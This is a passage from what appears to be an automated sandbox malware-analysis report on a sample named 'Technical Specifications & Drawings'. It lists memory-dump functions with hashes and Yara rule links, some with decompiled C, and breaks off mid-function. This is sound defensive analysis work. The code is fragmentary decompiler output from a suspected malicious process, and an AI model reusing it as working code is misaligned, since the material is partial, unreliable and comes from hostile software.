                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                  • Instruction ID: 21ee87a74434cfa7804dead83464fd936e20f400742cd4caaa3f9c6c06044c67
                                                  • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                  • Instruction Fuzzy Hash: 0BB092353019418FCE5ADF18C080B1573E8BB44B40F8400D8E400CBA21D229E8408900
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D2ACB Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017D2ACB() {
				void* _t5;

				return E017BEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                  0x017d2adc

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                  • Instruction ID: 4d4136843b52cda22022998e84203f70f07fa6e10037074d9aeffc0f6cd224e3
                                                  • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                  • Instruction Fuzzy Hash: AFB01232C10441CFCF02EF44C650F9AB331FB00750F0544A0900227A30C728AC01CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9950 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5740a8d466c92dfa996fabd9c0878cac1db32a428fb385033f91b3390b8d5e21
                                                  • Instruction ID: 39d8e067608cd7b64fd9a98b9a3bdf51e1003d559c021c41e0cbddacde73cca6
                                                  • Opcode Fuzzy Hash: 5740a8d466c92dfa996fabd9c0878cac1db32a428fb385033f91b3390b8d5e21
                                                  • Instruction Fuzzy Hash: D09002A120540407D150659988047074005A7D4342F52C025A3054565ECA698C51B176
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E99D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 386a67ac2849ff818222d67fb5c959616bc202f26ef7209a8c6dbf40d6b03a06
                                                  • Instruction ID: 95066b31dd3fc187b5bd9a346d95adc6c15b27fbc383fdd85d472c901604ac24
                                                  • Opcode Fuzzy Hash: 386a67ac2849ff818222d67fb5c959616bc202f26ef7209a8c6dbf40d6b03a06
                                                  • Instruction Fuzzy Hash: 769002A121500046D114619984047074045A7E5241F52C026A3144564CC5698C61B166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017EB040 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c60865cf5ade9ce30834443544f82fb84b39c9f151610ef087293f3d30caef1
                                                  • Instruction ID: e9bd48d7ea58e84c3c20ee40aca38132abc72592edcb9af653035fbd9ccda21a
                                                  • Opcode Fuzzy Hash: 7c60865cf5ade9ce30834443544f82fb84b39c9f151610ef087293f3d30caef1
                                                  • Instruction Fuzzy Hash: 289002A1605140474550B19988045079015B7E5341392C135A1444570CC6A88855F2A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9820 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9df499248cf1e179b5285adc9099d747478ed49a5eb190092ae38dda87815a7
                                                  • Instruction ID: 4eeee9929648211267a62fb9365686e63513ff35946e807219c4bfe5d5338453
                                                  • Opcode Fuzzy Hash: f9df499248cf1e179b5285adc9099d747478ed49a5eb190092ae38dda87815a7
                                                  • Instruction Fuzzy Hash: 3990027124500406D151719984047074009B7D4281F92C026A1414564EC6958A56FAA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E98A0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d19a05ad5ed6b5c43eb5956bd5723f5ed2f9ab72c773c0cd86a57e85620d24d7
                                                  • Instruction ID: 8b834d00fbfbd2982a78e4b8b35a9f0412a7d1ca2138ba3d5e5fd33ff29a2c8c
                                                  • Opcode Fuzzy Hash: d19a05ad5ed6b5c43eb5956bd5723f5ed2f9ab72c773c0cd86a57e85620d24d7
                                                  • Instruction Fuzzy Hash: 4690026130500406D112619984147074009E7D5385F92C026E2414565DC6658953F173
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9B00 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8b48d3b42731f1b885edb7dc3f8267d70fa3924edfeddd704aba68698992f75b
                                                  • Instruction ID: 886b5dd1e41b2b56ad504246f18a5a8ea665f8869a2847dd15f2c8acc216d64b
                                                  • Opcode Fuzzy Hash: 8b48d3b42731f1b885edb7dc3f8267d70fa3924edfeddd704aba68698992f75b
                                                  • Instruction Fuzzy Hash: EF90026124500806D1507199C4147074006E7D4641F52C025A1014564DC6568965B6F2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017EA3B0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf882c7429b505ee6f1922332a63759b000ee9f2f29cb17af7c7ad859aa114ba
                                                  • Instruction ID: 56e6625f6e6e0c88a559d7f5dc4d125d2b196d962f762c56706ce77a50481c26
                                                  • Opcode Fuzzy Hash: cf882c7429b505ee6f1922332a63759b000ee9f2f29cb17af7c7ad859aa114ba
                                                  • Instruction Fuzzy Hash: BB90027120544006D1507199C44470B9005B7E4341F52C425E1415564CC6558856F262
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9A10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e2e204811498f68e65bc66092128374dd663da4f6c563dc4cb37586813eac04
                                                  • Instruction ID: 779d280a7c8045163a1a8f64e54d31d5074f7ab950e4e4642a8e6f2e66b34e1d
                                                  • Opcode Fuzzy Hash: 1e2e204811498f68e65bc66092128374dd663da4f6c563dc4cb37586813eac04
                                                  • Instruction Fuzzy Hash: 0690027120540406D110619988087474005A7D4342F52C025A6154565EC6A5C891B572
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9A80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c21caa1a5cf86ee079176020c5ecc9e1f09dcee62c2419ce5013bca1d14e7fa9
                                                  • Instruction ID: ac98c9aac754b2785550dea2e41fdb91f0b707d0d08ca879c635f84b230e223e
                                                  • Opcode Fuzzy Hash: c21caa1a5cf86ee079176020c5ecc9e1f09dcee62c2419ce5013bca1d14e7fa9
                                                  • Instruction Fuzzy Hash: 1F90026120544446D15062998804B0F8105A7E5242F92C02DA5146564CC9558855B762
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9560 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f3573c194420106ea3daeea9e41b5d0defe32af4bca758d86e79319ff628172
                                                  • Instruction ID: ab6e98cb146df31cbf25029dc7380a24f28469f992262a39b2b705d1a240666c
                                                  • Opcode Fuzzy Hash: 8f3573c194420106ea3daeea9e41b5d0defe32af4bca758d86e79319ff628172
                                                  • Instruction Fuzzy Hash: 8B900265225000060155A599460460B4445B7DA391392C029F24065A0CC6618865B362
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017EAD30 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fce942e839e0b4126c3757c53e0622b406d432338f7421b611c2a502dc9b243f
                                                  • Instruction ID: f72b405f387e97ed81a5cffa14ea972c6ae0f7177227a9ec29b1eda4be3f1333
                                                  • Opcode Fuzzy Hash: fce942e839e0b4126c3757c53e0622b406d432338f7421b611c2a502dc9b243f
                                                  • Instruction Fuzzy Hash: 47900271A09000169150719988147478006B7E4781B56C025A1504564CC9948A55B3E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: faff2446f97067501f0e0e501dff82a40d4ffc57f2f7ebe1886a77ff26c2ce51
                                                  • Instruction ID: 792d4d551037e04d9eec7b47550357efc8e9130fb6b839e65284779088735b76
                                                  • Opcode Fuzzy Hash: faff2446f97067501f0e0e501dff82a40d4ffc57f2f7ebe1886a77ff26c2ce51
                                                  • Instruction Fuzzy Hash: FA9002E1205140964510A299C404B0B8505A7E4241B52C02AE2044570CC5658851F176
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E95F0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce6760b990cde7857c8751aada62c3fc2b2dff371f51619a1de1b122cd9834a0
                                                  • Instruction ID: f863d1e13710f433721c2e7cbfbd1b2c4e4b24ad1635e17dd5983d3f37b3988f
                                                  • Opcode Fuzzy Hash: ce6760b990cde7857c8751aada62c3fc2b2dff371f51619a1de1b122cd9834a0
                                                  • Instruction Fuzzy Hash: A990027120500806D114619988047874005A7D4341F52C025A7014665ED6A58891B172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017EA770 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b091857fb41974f0a70a1e45bde728e1c5a64d2603283f6141ff41f9b0b0b69c
                                                  • Instruction ID: 34a66de3ff255583f6ccd23bf6942f95cb7502391b0bea3d9e82e15e6998fc71
                                                  • Opcode Fuzzy Hash: b091857fb41974f0a70a1e45bde728e1c5a64d2603283f6141ff41f9b0b0b69c
                                                  • Instruction Fuzzy Hash: 2990027520904446D51065999804B874005A7D4345F52D425A14145ACDC6948861F162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9770 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 817f949e0290a304c880a5e180bae3c0ae8a9d2cadf3df0855e9e1e5b39e934b
                                                  • Instruction ID: 82aadad6d4e877c52b637b9d2c65779eb463240e53685becf67724ca6e08e2f9
                                                  • Opcode Fuzzy Hash: 817f949e0290a304c880a5e180bae3c0ae8a9d2cadf3df0855e9e1e5b39e934b
                                                  • Instruction Fuzzy Hash: B390026120904446D11065999408B074005A7D4245F52D025A20545A5DC6758851F172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9760 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ff7ab6f1a4f3322cc73ecdd60a360f65fd9f0373944fb15e47a43fec1abdb2a
                                                  • Instruction ID: 56485321b0205211d564a11866018fa9545953afb576fd9c1a9c1e0b154fadbe
                                                  • Opcode Fuzzy Hash: 5ff7ab6f1a4f3322cc73ecdd60a360f65fd9f0373944fb15e47a43fec1abdb2a
                                                  • Instruction Fuzzy Hash: B190027120500407D110619995087074005A7D4241F52D425A1414568DD6968851B162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9730 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a2a7a67338915eed0935664d3c8d4adc48709db9daa064725b52ed2ad23c4bc
                                                  • Instruction ID: 6e69433a080515426d0922a7e73b609f0ac78b7e1c8594bade7361a4797dfffb
                                                  • Opcode Fuzzy Hash: 6a2a7a67338915eed0935664d3c8d4adc48709db9daa064725b52ed2ad23c4bc
                                                  • Instruction Fuzzy Hash: 7490026160900406D150719994187074015A7D4241F52D025A1014564DC6998A55B6E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017EA710 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 124bf08840e09249fb5021e14930f38543da9e868c09879c7154b173e0b13c50
                                                  • Instruction ID: 26fabed9272aef6ca92a5e4d1716150f19456c4b17163b867c985b378abb258b
                                                  • Opcode Fuzzy Hash: 124bf08840e09249fb5021e14930f38543da9e868c09879c7154b173e0b13c50
                                                  • Instruction Fuzzy Hash: 71900271305000569510A6D99804B4B8105A7F4341B52D029A5004564CC5948861B162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9650 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 69d0c8ab054ab38440f77d718712560ed335a6e1d2aec744933abcaf946810c1
                                                  • Instruction ID: 0823b7eca6434c8c3dfbc3626bad841f70dad5e71421e9d3224f18c3f5cfde0b
                                                  • Opcode Fuzzy Hash: 69d0c8ab054ab38440f77d718712560ed335a6e1d2aec744933abcaf946810c1
                                                  • Instruction Fuzzy Hash: 1E90027120904846D15071998404B474015A7D4345F52C025A10546A4DD6658D55F6A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9610 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7f02a82433ad255ac7fad8ade59c757eb1b2ec91718436b66453740553acc4a9
                                                  • Instruction ID: 109a97089f814d4d3592b038252ed5c1d5d0ca1b2dfd574779ceb9270f6a3e50
                                                  • Opcode Fuzzy Hash: 7f02a82433ad255ac7fad8ade59c757eb1b2ec91718436b66453740553acc4a9
                                                  • Instruction Fuzzy Hash: 8790027160900806D160719984147474005A7D4341F52C025A1014664DC7958A55B6E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E96D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ec29137d2475e4915047594fadbe5dd09dc6f3f4eb3a092c603962a6b66c058
                                                  • Instruction ID: e45c1a695ec0bac70bad72955d8e6e4815e2fd1bd885a15bb84eedc259f667c7
                                                  • Opcode Fuzzy Hash: 2ec29137d2475e4915047594fadbe5dd09dc6f3f4eb3a092c603962a6b66c058
                                                  • Instruction Fuzzy Hash: 4A90027120500846D11061998404B474005A7E4341F52C02AA1114664DC655C851B562
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: 9bacc32c77824155fe088a494a36a370fde0edd508d59a664882873545d2386c
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 26%
                                                  			E017D645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x189d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E017EFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
